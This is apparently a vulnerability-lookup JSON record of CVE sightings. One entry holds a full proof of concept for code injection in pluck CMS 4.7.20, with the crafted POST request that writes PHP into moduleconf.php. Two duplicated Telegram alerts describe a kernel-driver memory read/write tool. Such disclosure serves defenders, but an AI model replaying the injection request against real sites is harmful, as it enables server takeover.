{"vulnerability": "cve-2026-3819", "sightings": [{"uuid": "3d225f80-b5df-4b11-bfd9-c4680abc3074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-38192", "type": "seen", "source": "https://gist.github.com/Echore61/a64f2a2ad7373ad91afee2a50316fecf", "content": "[CVE ID}\nCVE-2026-38192\n[PRODUCT]\npluck-CMS-4.7.20\n[VERSION]\npluck-CMS-4.7.20\n[PROBLEM TYPE]\ncode-injection\n[DESCRIPTION]\nIn admin.php, the module_addtosite function iterates through the entire $_POST array, splits the user-controllable parameter names using explode('|', ...) and directly concatenates them into data/settings/themes//moduleconf.php. This file will subsequently be included in the backend page and frontend theme_area() rendering process. Since the parameter names have not undergone whitelist verification and security escaping, attackers can contaminate executable PHP files, leading to code injection vulnerabilities.\nProject address\uff1ahttps://github.com/pluck-cms/pluck/\n\nReproduction environment\uff1apluck-CMS-4.7.20 Apache2.4.39 PHP7.3.4 MySQL8.0.12\n1\u3001First, install a brand-new environment.\n2\u3001Access the \"/login.php\" page, log in to the administrator's account, and after successful login, note down the current Cookie as follows: login_history=1%7Cd1cca638fd415f8faca3e58d5c75832d; PHPSESSID=065b37ga6e7u45e6bocd02if0j\n\nGET /admin.php?action=start HTTP/1.1\nHost: 10.142.77.31\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://10.142.77.31/login.php\nConnection: close\nCookie: login_history=1%7Cd1cca638fd415f8faca3e58d5c75832d; PHPSESSID=065b37ga6e7u45e6bocd02if0j\nUpgrade-Insecure-Requests: 1\nPriority: u=0, i\n\n3\u3001Send a POST data packet, with the injected code being \"phpinfo();\"\n\nPOST /admin.php?action=module_addtosite HTTP/1.1\nHost: 10.142.77.31\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://10.142.77.31/admin.php?action=start\nConnection: close\nCookie: login_history=1%7Cd1cca638fd415f8faca3e58d5c75832d; PHPSESSID=065b37ga6e7u45e6bocd02if0j\nUpgrade-Insecure-Requests: 1\nPriority: u=0, i\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 40\n\nsave=1%3Bphpinfo%28%29%3B%2F%2F%7Cm%3D11\n\n4\u3001Access the root directory of the website, and it will redirect to the homepage. It is found that the injected code has been executed.\n\nlink for reference:https://github.com/Echore61/pluck-CMS-4.7.20-code-injection-vulnerability", "creation_timestamp": "2026-05-25T08:35:08.000000Z"}, {"uuid": "7ea26a01-c7dc-403d-a62d-a03cdce0330a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-38194", "type": "seen", "source": "https://t.me/GithubRedTeam/89018", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cormem-read-poc\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a 4D4J\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C++\n\u2b50 Star\u6570\u91cf\uff1a 5  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-15 21:35:32\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nThis tool demonstrates CVE-2026-38194, a vulnerability in Teledyne Digital Imaging Sapera Memory Manager (v9.0.0.0 and below).  The CORMEM.SYS kernel driver exposes IOCTLs without any access control checks, allowing a standard unprivileged user to read and write arbitrary process memory directly through the kernel \u2014 bypassing Win32 API monitoring\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-13T22:00:42.393242Z"}, {"uuid": "9bead2ca-20c6-47f0-8ced-8badec4f2ee5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-38194", "type": "seen", "source": "https://t.me/GithubRedTeam/89018", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cormem-read-poc\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a 4D4J\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C++\n\u2b50 Star\u6570\u91cf\uff1a 5  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-15 21:35:32\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nThis tool demonstrates CVE-2026-38194, a vulnerability in Teledyne Digital Imaging Sapera Memory Manager (v9.0.0.0 and below).  The CORMEM.SYS kernel driver exposes IOCTLs without any access control checks, allowing a standard unprivileged user to read and write arbitrary process memory directly through the kernel \u2014 bypassing Win32 API monitoring\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-14T00:00:41.521619Z"}]}